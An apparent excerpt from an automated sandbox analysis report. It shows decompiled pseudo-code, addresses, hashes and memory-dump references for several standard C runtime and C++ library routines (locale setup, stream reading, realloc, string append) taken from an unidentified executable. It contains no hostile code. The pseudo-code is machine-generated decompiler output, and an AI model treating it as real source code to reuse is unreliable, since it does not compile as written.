                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0030120F
                                              • Part of subcall function 00308748: _setlocale.LIBCMT ref: 0030874F
                                              • Part of subcall function 00308748: _Yarn.LIBCPMT ref: 00308767
                                              • Part of subcall function 00308748: _setlocale.LIBCMT ref: 00308777
                                              • Part of subcall function 00308748: _Yarn.LIBCPMT ref: 0030878B
                                            • std::exception::exception.LIBCMT ref: 0030122E
                                            • __CxxThrowException@8.LIBCMT ref: 00301243
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Yarn_setlocalestd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw__lockstd::exception::exception
                                            • String ID: bad locale name
                                            • API String ID: 601777697-1405518554
                                            • Opcode ID: 6bd5941fe545db7b371c8bf08ee2f41de8cf1f7ca12758689b38f6a72989fd21
                                            • Instruction ID: 3ca488e5ecdc024d0ae0556cb17203161a95b12bc18e2ca380ab069763a5a5e2
                                            • Opcode Fuzzy Hash: 6bd5941fe545db7b371c8bf08ee2f41de8cf1f7ca12758689b38f6a72989fd21
                                            • Instruction Fuzzy Hash: BC015EB05017489EC721DF75D455B8BBBF8AF24700F008A6EE889D7A81E774E208CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 003093AF, Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E003093AF(void* __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				void* _t62;
				intOrPtr _t72;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t103;
				signed int* _t109;
				void* _t112;
				signed int _t113;
				intOrPtr _t114;
				intOrPtr _t116;
				void* _t117;

				_t113 = __esi;
				_push(0x2c);
				E0030F5B3(E003247DE, __ebx, __edi, __esi);
				_t112 = __ecx;
				_t60 =  *((intOrPtr*)(__ecx + 0x1c));
				_t95 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
				if(_t95 == 0) {
					L3:
					_t93 = 0;
					__eflags =  *((intOrPtr*)(_t112 + 0x50));
					if( *((intOrPtr*)(_t112 + 0x50)) != 0) {
						E00308DE4(_t112);
						__eflags =  *((intOrPtr*)(_t112 + 0x40));
						if(__eflags != 0) {
							 *((intOrPtr*)(_t117 - 0x14)) = 0xf;
							 *((intOrPtr*)(_t117 - 0x18)) = 0;
							 *((char*)(_t117 - 0x28)) = 0;
							_push( *((intOrPtr*)(_t112 + 0x50)));
							 *((intOrPtr*)(_t117 - 4)) = 0;
							_t62 = E00310141(0, _t112, _t113, __eflags);
							_t113 = _t113 | 0xffffffff;
							while(1) {
								__eflags = _t62 - _t113;
								if(_t62 == _t113) {
									break;
								}
								E00305FC0(_t62, _t117 - 0x28, 1, _t62);
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								_t93 =  *((intOrPtr*)(_t117 - 0x28));
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									 *((intOrPtr*)(_t117 - 0x34)) = _t117 - 0x28;
								} else {
									 *((intOrPtr*)(_t117 - 0x34)) = _t93;
								}
								__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
								if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
									_t93 = _t117 - 0x28;
								}
								_t72 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x40)))) + 0x18))(_t112 + 0x48, _t93,  *((intOrPtr*)(_t117 - 0x18)) +  *((intOrPtr*)(_t117 - 0x34)), _t117 - 0x30, _t117 - 0x29, _t117 - 0x28, _t117 - 0x38);
								__eflags = _t72;
								if(_t72 < 0) {
									L22:
									E00302DA0(_t117 - 0x28, 1, 0);
									L23:
									return E0030F571(_t93, _t112, _t113);
								} else {
									__eflags = _t72 - 1;
									if(_t72 <= 1) {
										__eflags =  *((intOrPtr*)(_t117 - 0x38)) - _t117 - 0x29;
										if( *((intOrPtr*)(_t117 - 0x38)) != _t117 - 0x29) {
											__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
											_t114 =  *((intOrPtr*)(_t117 - 0x28));
											if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
												_t114 = _t117 - 0x28;
											}
											_t77 =  *((intOrPtr*)(_t117 - 0x30));
											_t116 = _t114 - _t77 +  *((intOrPtr*)(_t117 - 0x18));
											__eflags = _t116;
											if(__eflags <= 0) {
												L21:
												_t113 =  *(_t117 - 0x29) & 0x000000ff;
												goto L22;
											} else {
												goto L34;
											}
											while(1) {
												L34:
												_push( *((intOrPtr*)(_t112 + 0x50)));
												_t116 = _t116 - 1;
												_push( *((char*)(_t116 + _t77)));
												E003108C1(_t93, _t112, _t116, __eflags);
												__eflags = _t116;
												if(__eflags <= 0) {
													goto L21;
												}
												_t77 =  *((intOrPtr*)(_t117 - 0x30));
											}
											goto L21;
										}
										__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
										_t103 =  *((intOrPtr*)(_t117 - 0x28));
										if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
											_t103 = _t117 - 0x28;
										}
										_t81 =  *((intOrPtr*)(_t117 - 0x30)) - _t103;
										__eflags = _t81;
										_push(_t81);
										E00304340(_t117 - 0x28, 0);
										L28:
										_push( *((intOrPtr*)(_t112 + 0x50)));
										_t62 = E00310141(_t93, _t112, _t113, __eflags);
										continue;
									}
									__eflags = _t72 - 3;
									if(_t72 != 3) {
										goto L22;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x18)) - 1;
									if(__eflags < 0) {
										goto L28;
									}
									__eflags =  *((intOrPtr*)(_t117 - 0x14)) - 0x10;
									_t83 =  *((intOrPtr*)(_t117 - 0x28));
									if( *((intOrPtr*)(_t117 - 0x14)) < 0x10) {
										_t83 = _t117 - 0x28;
									}
									E00310931(_t117 - 0x29, 1, _t83, 1);
									goto L21;
								}
							}
							goto L22;
						}
						 *((char*)(_t117 - 0x2a)) = 0;
						_t60 = E00308847(__eflags, _t117 - 0x2a,  *((intOrPtr*)(_t112 + 0x50)));
						__eflags = _t60;
						if(_t60 == 0) {
							goto L4;
						}
						goto L23;
					}
					L4:
					goto L23;
				}
				_t109 =  *(__ecx + 0x2c);
				_t113 =  *_t109;
				_t60 = _t113 + _t95;
				if(_t95 >= _t113 + _t95) {
					goto L3;
				}
				 *_t109 = _t113 - 1;
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) + 1;
				goto L23;
			}
















                                            0x003093af
                                            0x003093af
                                            0x003093b6
                                            0x003093bb
                                            0x003093bd
                                            0x003093c0
                                            0x003093c4
                                            0x003093e9
                                            0x003093e9
                                            0x003093eb
                                            0x003093ee
                                            0x003093fa
                                            0x003093ff
                                            0x00309402
                                            0x00309422
                                            0x00309429
                                            0x0030942c
                                            0x0030942f
                                            0x00309432
                                            0x00309435
                                            0x0030943a
                                            0x00309503
                                            0x00309504
                                            0x00309506
                                            0x00000000
                                            0x00000000
                                            0x00309448
                                            0x0030944d
                                            0x00309451
                                            0x00309454
                                            0x0030945e
                                            0x00309456
                                            0x00309456
                                            0x00309456
                                            0x00309461
                                            0x00309465
                                            0x00309467
                                            0x00309467
                                            0x0030948b
                                            0x0030948e
                                            0x00309490
                                            0x003094c3
                                            0x003094ca
                                            0x003094d1
                                            0x003094d6
                                            0x00309492
                                            0x00309492
                                            0x00309495
                                            0x003094da
                                            0x003094dd
                                            0x0030950e
                                            0x00309512
                                            0x00309515
                                            0x00309517
                                            0x00309517
                                            0x0030951a
                                            0x0030951f
                                            0x00309522
                                            0x00309524
                                            0x003094bf
                                            0x003094bf
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00309526
                                            0x00309526
                                            0x00309526
                                            0x00309529
                                            0x0030952e
                                            0x0030952f
                                            0x00309536
                                            0x00309538
                                            0x00000000
                                            0x00000000
                                            0x0030953a
                                            0x0030953a
                                            0x00000000
                                            0x00309526
                                            0x003094df
                                            0x003094e3
                                            0x003094e6
                                            0x003094e8
                                            0x003094e8
                                            0x003094ee
                                            0x003094ee
                                            0x003094f3
                                            0x003094f6
                                            0x003094fb
                                            0x003094fb
                                            0x003094fe
                                            0x00000000
                                            0x003094fe
                                            0x00309497
                                            0x0030949a
                                            0x00000000
                                            0x00000000
                                            0x0030949c
                                            0x003094a0
                                            0x00000000
                                            0x00000000
                                            0x003094a2
                                            0x003094a6
                                            0x003094a9
                                            0x003094ab
                                            0x003094ab
                                            0x003094b7
                                            0x00000000
                                            0x003094bc
                                            0x00309490
                                            0x00000000
                                            0x0030950c
                                            0x0030940a
                                            0x0030940e
                                            0x00309415
                                            0x00309417
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00309419
                                            0x003093f0
                                            0x00000000
                                            0x003093f0
                                            0x003093c6
                                            0x003093c9
                                            0x003093cb
                                            0x003093d0
                                            0x00000000
                                            0x00000000
                                            0x003093d5
                                            0x003093df
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: H_prolog3__fgetc_ungetc
                                            • String ID:
                                            • API String ID: 1616942180-0
                                            • Opcode ID: 50b3694d6c57c57289e80139cafe20baa64552afe0d46024ee3625acf27da9ba
                                            • Instruction ID: b2d8c75461998410bd533c2ec1c970c470ba1206d77cc19f512f5d24ab3cfff4
                                            • Opcode Fuzzy Hash: 50b3694d6c57c57289e80139cafe20baa64552afe0d46024ee3625acf27da9ba
                                            • Instruction Fuzzy Hash: E1518471A0261ADFCF16DFA5C4A1AEDB7B4FF09310F14006AE501B75C2D771A985CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0031B46C, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 96%
                                            			E0031B46C(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					__eflags = _t31;
					if(_t31 != 0) {
						_push(__ebx);
						while(1) {
							__eflags = _t31 - 0xffffffe0;
							if(_t31 > 0xffffffe0) {
								break;
							}
							__eflags = _t31;
							if(_t31 == 0) {
								_t31 = _t31 + 1;
								__eflags = _t31;
							}
							_t7 = HeapReAlloc( *0x331e20, 0, _a4, _t31);
							_t20 = _t7;
							__eflags = _t20;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								__eflags =  *0x332ae0 - _t7;
								if(__eflags == 0) {
									_t9 = E0030E9C6(__eflags);
									 *_t9 = E0030E9D9(GetLastError());
									goto L17;
								} else {
									__eflags = E00316930(_t7, _t31);
									if(__eflags == 0) {
										_t12 = E0030E9C6(__eflags);
										 *_t12 = E0030E9D9(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00316930(_t6, _t31);
						 *((intOrPtr*)(E0030E9C6(__eflags))) = 0xc;
						goto L12;
					} else {
						E0030DCB0(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0030FA82(__ebx, __edx, __edi, _a8);
				}
			}









                                            0x0031b473
                                            0x0031b481
                                            0x0031b484
                                            0x0031b486
                                            0x0031b495
                                            0x0031b4c8
                                            0x0031b4c8
                                            0x0031b4cb
                                            0x00000000
                                            0x00000000
                                            0x0031b498
                                            0x0031b49a
                                            0x0031b49c
                                            0x0031b49c
                                            0x0031b49c
                                            0x0031b4a9
                                            0x0031b4af
                                            0x0031b4b1
                                            0x0031b4b3
                                            0x0031b513
                                            0x0031b513
                                            0x0031b4b5
                                            0x0031b4b5
                                            0x0031b4bb
                                            0x0031b4fd
                                            0x0031b511
                                            0x00000000
                                            0x0031b4bd
                                            0x0031b4c4
                                            0x0031b4c6
                                            0x0031b4e5
                                            0x0031b4f9
                                            0x0031b4df
                                            0x0031b4df
                                            0x0031b4df
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0031b4c6
                                            0x0031b4bb
                                            0x00000000
                                            0x0031b4e1
                                            0x0031b4ce
                                            0x0031b4d9
                                            0x00000000
                                            0x0031b488
                                            0x0031b48b
                                            0x0031b491
                                            0x0031b491
                                            0x0031b4e2
                                            0x0031b4e4
                                            0x0031b475
                                            0x0031b47f
                                            0x0031b47f

                                            APIs
                                            • _malloc.LIBCMT ref: 0031B478
                                              • Part of subcall function 0030FA82: __FF_MSGBANNER.LIBCMT ref: 0030FA99
                                              • Part of subcall function 0030FA82: __NMSG_WRITE.LIBCMT ref: 0030FAA0
                                              • Part of subcall function 0030FA82: RtlAllocateHeap.NTDLL(00D00000,00000000,00000001,00000001,00000050,00000050,?,0030D41B,00000001,00000000,00000050,00000050,?,0030D355,00309985,?), ref: 0030FAC5
                                            • _free.LIBCMT ref: 0031B48B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap_free_malloc
                                            • String ID:
                                            • API String ID: 1020059152-0
                                            • Opcode ID: 457a18ce7b7f27f82b2778b3e5a44cc247879b3c2b2bdd7c2f0cb3be5943b6f5
                                            • Instruction ID: b7fb3d71c77b3dae2dc1a914f18a94df0192502c12f0b971ab95fdde433549b9
                                            • Opcode Fuzzy Hash: 457a18ce7b7f27f82b2778b3e5a44cc247879b3c2b2bdd7c2f0cb3be5943b6f5
                                            • Instruction Fuzzy Hash: A911C632505225AFCB3B3FB5BC156DA7798AF0C3A1F11C929F9499E592DF3888C096D0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00302A40, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 248COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00302A40(intOrPtr* __ecx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _v0;
				char _v20;
				intOrPtr* _v36;
				intOrPtr* _v40;
				intOrPtr _v64;
				char _v68;
				void* __ebp;
				intOrPtr _t63;
				signed int _t66;
				void* _t73;
				intOrPtr _t75;
				char* _t82;
				intOrPtr _t86;
				intOrPtr _t92;
				signed int _t99;
				signed int _t108;
				intOrPtr _t112;
				void* _t125;
				char _t126;
				intOrPtr* _t127;
				intOrPtr _t128;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t152;
				intOrPtr _t157;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr* _t163;
				signed int _t166;
				signed int _t167;
				intOrPtr _t168;
				intOrPtr* _t169;
				intOrPtr _t170;
				char _t171;
				intOrPtr _t172;
				void* _t174;
				signed int _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				void* _t212;
				void* _t213;
				void* _t215;

				_t161 = _a8;
				_push(_t125);
				_t190 = __ecx;
				_t150 = _a4;
				_t63 =  *((intOrPtr*)(_t150 + 0x10));
				if(_t63 < _t161) {
					E0030999B(__eflags, "invalid string position");
					goto L23;
				} else {
					_t108 = _t63 - _t161;
					_t168 =  *((intOrPtr*)(__ecx + 0x10));
					_t125 =  <  ? _t108 : _a12;
					if((_t108 | 0xffffffff) - _t168 <= _t125) {
						L23:
						_push("string too long");
						E0030996D(__eflags);
						goto L24;
					} else {
						if(_t125 == 0) {
							L21:
							return _t190;
						} else {
							_push(_t170);
							_t170 = _t168 + _t125;
							if(_t170 > 0xfffffffe) {
								L24:
								_push("string too long");
								_t66 = E0030996D(__eflags);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t212 = _t215;
								_push(_t125);
								_t126 = _v20;
								_push(_t190);
								_t191 = _t150;
								__eflags = _t126;
								if(_t126 == 0) {
									L37:
									_t162 =  *((intOrPtr*)(_t191 + 0x10));
									_t151 = _a4;
									__eflags = (_t66 | 0xffffffff) - _t162 - _t151;
									if(__eflags <= 0) {
										_push("string too long");
										E0030996D(__eflags);
										goto L57;
									} else {
										__eflags = _t151;
										if(_t151 == 0) {
											L55:
											return _t191;
										} else {
											_push(_t170);
											_t170 = _t162 + _t151;
											__eflags = _t170 - 0xfffffffe;
											if(__eflags > 0) {
												L57:
												_push("string too long");
												E0030996D(__eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t212);
												_t213 = _t215;
												_push(_t126);
												_t127 = _v40;
												_push(_t191);
												_push(_t170);
												_t192 = _t151;
												_t152 = _v36;
												_t171 =  *((intOrPtr*)(_t127 + 0x10));
												__eflags = _t171 - _t152;
												if(__eflags < 0) {
													E0030999B(__eflags, "invalid string position");
													goto L83;
												} else {
													_t174 = _t171 - _t152;
													__eflags = _a4 - _t174;
													_t171 =  <  ? _a4 : _t174;
													__eflags = _t192 - _t127;
													if(_t192 != _t127) {
														__eflags = _t171 - 0xfffffffe;
														if(__eflags > 0) {
															goto L84;
														} else {
															_t75 =  *((intOrPtr*)(_t192 + 0x14));
															__eflags = _t75 - _t171;
															if(_t75 >= _t171) {
																__eflags = _t171;
																if(_t171 != 0) {
																	goto L67;
																} else {
																	 *((intOrPtr*)(_t192 + 0x10)) = _t171;
																	__eflags = _t75 - 0x10;
																	if(_t75 < 0x10) {
																		_t82 = _t192;
																		 *_t82 = 0;
																		return _t82;
																	} else {
																		 *((char*)( *_t192)) = 0;
																		return _t192;
																	}
																}
															} else {
																E00306290(_t192, _t171,  *((intOrPtr*)(_t192 + 0x10)));
																_t152 = _v0;
																__eflags = _t171;
																if(_t171 == 0) {
																	L81:
																	return _t192;
																} else {
																	L67:
																	__eflags =  *((intOrPtr*)(_t127 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t127 + 0x14)) >= 0x10) {
																		_t127 =  *_t127;
																	}
																	__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
																	if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																		_t163 = _t192;
																	} else {
																		_t163 =  *_t192;
																	}
																	__eflags = _t171;
																	if(_t171 != 0) {
																		E0030EE10(_t163, _t127 + _t152, _t171);
																	}
																	__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
																	 *((intOrPtr*)(_t192 + 0x10)) = _t171;
																	if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																		 *((char*)(_t192 + _t171)) = 0;
																		goto L81;
																	} else {
																		 *((char*)( *_t192 + _t171)) = 0;
																		return _t192;
																	}
																}
															}
														}
													} else {
														_t86 = _t171 + _t152;
														__eflags =  *((intOrPtr*)(_t192 + 0x10)) - _t86;
														if(__eflags < 0) {
															L83:
															E0030999B(__eflags, "invalid string position");
															L84:
															_push("string too long");
															_t73 = E0030996D(__eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t213);
															__eflags = _v68;
															_push(_t192);
															_push(_t171);
															_t172 = _v64;
															_t193 = _t152;
															if(_v68 != 0) {
																__eflags =  *((intOrPtr*)(_t193 + 0x14)) - 0x10;
																if( *((intOrPtr*)(_t193 + 0x14)) >= 0x10) {
																	_push(_t127);
																	_t128 =  *_t193;
																	__eflags = _t172;
																	if(_t172 != 0) {
																		E0030EE10(_t193, _t128, _t172);
																		_t215 = _t215 + 0xc;
																	}
																	_t73 = L0030DF6A(_t128);
																}
															}
															 *((intOrPtr*)(_t193 + 0x10)) = _t172;
															 *((intOrPtr*)(_t193 + 0x14)) = 0xf;
															 *((char*)(_t172 + _t193)) = 0;
															return _t73;
														} else {
															__eflags =  *((intOrPtr*)(_t192 + 0x14)) - 0x10;
															 *((intOrPtr*)(_t192 + 0x10)) = _t86;
															if( *((intOrPtr*)(_t192 + 0x14)) < 0x10) {
																_push(_t152);
																 *((char*)(_t192 + _t86)) = 0;
																E00304340(_t192, 0);
																return _t192;
															} else {
																_push(_t152);
																 *((char*)( *_t192 + _t86)) = 0;
																E00304340(_t192, 0);
																return _t192;
															}
														}
													}
												}
											} else {
												_t92 =  *((intOrPtr*)(_t191 + 0x14));
												__eflags = _t92 - _t170;
												if(_t92 >= _t170) {
													__eflags = _t170;
													if(_t170 != 0) {
														goto L42;
													} else {
														 *((intOrPtr*)(_t191 + 0x10)) = _t170;
														__eflags = _t92 - 0x10;
														if(_t92 < 0x10) {
															_t99 = _t191;
															 *_t99 = 0;
															return _t99;
														} else {
															 *( *_t191) = 0;
															return _t191;
														}
													}
												} else {
													E00306290(_t191, _t170, _t162);
													_t151 = _a4;
													__eflags = _t170;
													if(_t170 == 0) {
														L54:
														goto L55;
													} else {
														L42:
														__eflags =  *((intOrPtr*)(_t191 + 0x14)) - 0x10;
														if( *((intOrPtr*)(_t191 + 0x14)) < 0x10) {
															_t166 = _t191;
														} else {
															_t166 =  *_t191;
														}
														__eflags = _t151;
														if(_t151 != 0) {
															__eflags =  *((intOrPtr*)(_t191 + 0x10)) + _t166;
															E0030EE10( *((intOrPtr*)(_t191 + 0x10)) + _t166, _t126, _t151);
														}
														__eflags =  *((intOrPtr*)(_t191 + 0x14)) - 0x10;
														 *((intOrPtr*)(_t191 + 0x10)) = _t170;
														if( *((intOrPtr*)(_t191 + 0x14)) < 0x10) {
															 *((char*)(_t191 + _t170)) = 0;
															goto L54;
														} else {
															 *((char*)( *_t191 + _t170)) = 0;
															return _t191;
														}
													}
												}
											}
										}
									}
								} else {
									_t157 =  *((intOrPtr*)(_t191 + 0x14));
									__eflags = _t157 - 0x10;
									if(_t157 < 0x10) {
										_t66 = _t191;
									} else {
										_t66 =  *_t191;
									}
									__eflags = _t126 - _t66;
									if(_t126 < _t66) {
										goto L37;
									} else {
										__eflags = _t157 - 0x10;
										if(_t157 < 0x10) {
											_t167 = _t191;
										} else {
											_t167 =  *_t191;
										}
										_t66 =  *((intOrPtr*)(_t191 + 0x10)) + _t167;
										__eflags = _t66 - _t126;
										if(_t66 <= _t126) {
											goto L37;
										} else {
											__eflags = _t157 - 0x10;
											if(_t157 < 0x10) {
												_push(_a4);
												__eflags = _t126 - _t191;
												return E00302A40(_t191, _t191, _t126 - _t191);
											} else {
												_push(_a4);
												__eflags = _t126 -  *_t191;
												return E00302A40(_t191, _t191, _t126 -  *_t191);
											}
										}
									}
								}
							} else {
								_t112 =  *((intOrPtr*)(__ecx + 0x14));
								if(_t112 >= _t170) {
									__eflags = _t170;
									if(_t170 != 0) {
										goto L6;
									} else {
										 *((intOrPtr*)(__ecx + 0x10)) = _t170;
										__eflags = _t112 - 0x10;
										if(_t112 < 0x10) {
											 *((char*)(__ecx)) = 0;
											return __ecx;
										} else {
											 *((char*)( *__ecx)) = 0;
											return __ecx;
										}
									}
								} else {
									E00306290(__ecx, _t170, _t168);
									_t150 = _a4;
									if(_t170 == 0) {
										L20:
										goto L21;
									} else {
										L6:
										if( *((intOrPtr*)(_t150 + 0x14)) >= 0x10) {
											_t150 =  *_t150;
										}
										if( *((intOrPtr*)(_t190 + 0x14)) < 0x10) {
											_t169 = _t190;
										} else {
											_t169 =  *_t190;
										}
										if(_t125 != 0) {
											E0030EE10( *((intOrPtr*)(_t190 + 0x10)) + _t169, _a8 + _t150, _t125);
										}
										 *((intOrPtr*)(_t190 + 0x10)) = _t170;
										if( *((intOrPtr*)(_t190 + 0x14)) < 0x10) {
											 *((char*)(_t190 + _t170)) = 0;
											goto L20;
										} else {
											 *((char*)( *_t190 + _t170)) = 0;
											return _t190;
										}
									}
								}
							}
						}
					}
				}
			}













































                                            0x00302a43
                                            0x00302a46
                                            0x00302a48
                                            0x00302a4a
                                            0x00302a4d
                                            0x00302a52
                                            0x00302b1d
                                            0x00000000
                                            0x00302a58
                                            0x00302a5b
                                            0x00302a5d
                                            0x00302a62
                                            0x00302a6c
                                            0x00302b22
                                            0x00302b22
                                            0x00302b27
                                            0x00000000
                                            0x00302a72
                                            0x00302a74
                                            0x00302b10
                                            0x00302b15
                                            0x00302a7a
                                            0x00302a7a
                                            0x00302a7b
                                            0x00302a81
                                            0x00302b2c
                                            0x00302b2c
                                            0x00302b31
                                            0x00302b36
                                            0x00302b37
                                            0x00302b38
                                            0x00302b39
                                            0x00302b3a
                                            0x00302b3b
                                            0x00302b3c
                                            0x00302b3d
                                            0x00302b3e
                                            0x00302b3f
                                            0x00302b41
                                            0x00302b43
                                            0x00302b44
                                            0x00302b47
                                            0x00302b48
                                            0x00302b4a
                                            0x00302b4c
                                            0x00302ba5
                                            0x00302ba5
                                            0x00302bab
                                            0x00302bb0
                                            0x00302bb2
                                            0x00302c51
                                            0x00302c56
                                            0x00000000
                                            0x00302bb8
                                            0x00302bb8
                                            0x00302bba
                                            0x00302c49
                                            0x00302c4e
                                            0x00302bc0
                                            0x00302bc0
                                            0x00302bc1
                                            0x00302bc4
                                            0x00302bc7
                                            0x00302c5b
                                            0x00302c5b
                                            0x00302c60
                                            0x00302c65
                                            0x00302c66
                                            0x00302c67
                                            0x00302c68
                                            0x00302c69
                                            0x00302c6a
                                            0x00302c6b
                                            0x00302c6c
                                            0x00302c6d
                                            0x00302c6e
                                            0x00302c6f
                                            0x00302c70
                                            0x00302c71
                                            0x00302c73
                                            0x00302c74
                                            0x00302c77
                                            0x00302c78
                                            0x00302c79
                                            0x00302c7b
                                            0x00302c7e
                                            0x00302c81
                                            0x00302c83
                                            0x00302d77
                                            0x00000000
                                            0x00302c89
                                            0x00302c89
                                            0x00302c8b
                                            0x00302c8e
                                            0x00302c92
                                            0x00302c94
                                            0x00302cdd
                                            0x00302ce0
                                            0x00000000
                                            0x00302ce6
                                            0x00302ce6
                                            0x00302ce9
                                            0x00302ceb
                                            0x00302d11
                                            0x00302d13
                                            0x00000000
                                            0x00302d15
                                            0x00302d15
                                            0x00302d18
                                            0x00302d1b
                                            0x00302d2b
                                            0x00302d30
                                            0x00302d34
                                            0x00302d1d
                                            0x00302d20
                                            0x00302d28
                                            0x00302d28
                                            0x00302d1b
                                            0x00302ced
                                            0x00302cf3
                                            0x00302cf8
                                            0x00302cfb
                                            0x00302cfd
                                            0x00302d69
                                            0x00302d6f
                                            0x00302cff
                                            0x00302cff
                                            0x00302cff
                                            0x00302d03
                                            0x00302d05
                                            0x00302d05
                                            0x00302d07
                                            0x00302d0b
                                            0x00302d37
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d0d
                                            0x00302d39
                                            0x00302d3b
                                            0x00302d43
                                            0x00302d48
                                            0x00302d4b
                                            0x00302d4f
                                            0x00302d52
                                            0x00302d65
                                            0x00000000
                                            0x00302d54
                                            0x00302d56
                                            0x00302d60
                                            0x00302d60
                                            0x00302d52
                                            0x00302cfd
                                            0x00302ceb
                                            0x00302c96
                                            0x00302c96
                                            0x00302c99
                                            0x00302c9c
                                            0x00302d7c
                                            0x00302d81
                                            0x00302d86
                                            0x00302d86
                                            0x00302d8b
                                            0x00302d90
                                            0x00302d91
                                            0x00302d92
                                            0x00302d93
                                            0x00302d94
                                            0x00302d95
                                            0x00302d96
                                            0x00302d97
                                            0x00302d98
                                            0x00302d99
                                            0x00302d9a
                                            0x00302d9b
                                            0x00302d9c
                                            0x00302d9d
                                            0x00302d9e
                                            0x00302d9f
                                            0x00302da0
                                            0x00302da3
                                            0x00302da7
                                            0x00302da8
                                            0x00302da9
                                            0x00302dac
                                            0x00302dae
                                            0x00302db0
                                            0x00302db4
                                            0x00302db6
                                            0x00302db7
                                            0x00302db9
                                            0x00302dbb
                                            0x00302dc0
                                            0x00302dc5
                                            0x00302dc5
                                            0x00302dc9
                                            0x00302dd1
                                            0x00302db4
                                            0x00302dd2
